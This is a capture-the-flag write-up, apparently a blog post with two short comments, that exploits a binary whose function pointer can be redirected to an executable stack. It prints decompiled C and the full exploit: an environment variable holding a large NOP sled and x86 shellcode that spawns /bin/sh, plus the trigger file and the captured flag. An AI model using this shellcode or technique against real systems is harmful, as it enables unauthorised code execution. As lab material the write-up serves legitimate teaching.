Here we are given ssh credentials where we need to exploit the binary.
Summary: compose file to make program jump to stack.
Let’s decompile it the binary:
int func() { puts("func"); return 0; } int main(int argc, char *argv[]) { char s[12]; memset(s, 0x90u, 0x12u); FILE *stream = fopen(argv[1], "r"); if (stream) { int nread = fread(s, 1u, 0xCu, stream); if (nread == 12) { fclose(stream); void (*ptr)() = func; // 0x08048540 unsigned int b4 = (s[4] | 1) ^ 0xE0; unsigned int b3 = (s[1] | 1) ^ 0xE0; b3 <<= 16; b4 <<= 24; strncpy(test, s, 0x12u); // ??? ptr = (b4 | b3 | ptr); ptr(); return 0; } } return 1; } |
The algorithm is simple – 12 bytes are read from argv[1] and 2nd and 5th are used to modify ptr which is called later.
The stack here is executable, so it’s straightforward: we should make ptr pointing to stack to our payload.
The stack addresses here are like 0xbfbfXXXX. So, the needed symbol is
0xBF ^ 0xE0 = '_' or
0xBF ^ 0xE1 = '^'
So, if we put twelve “_” into a file, we’ll jump to 0xbfbf8540.
Then we just put this stuff into a file and push a huge nopsled with shellcode:
$ mkdir /tmp/solve $ cd /tmp/solve $ export SC="` perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`" $ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test ~/X ./test $ cat ~/password key_is_The_davinci_cod3_! |
The flag: key_is_The_davinci_cod3_!
2 comments
What tools do you use to decompile binary?
Author
You can use IDA with Hex-Rays ;) And some manual fixing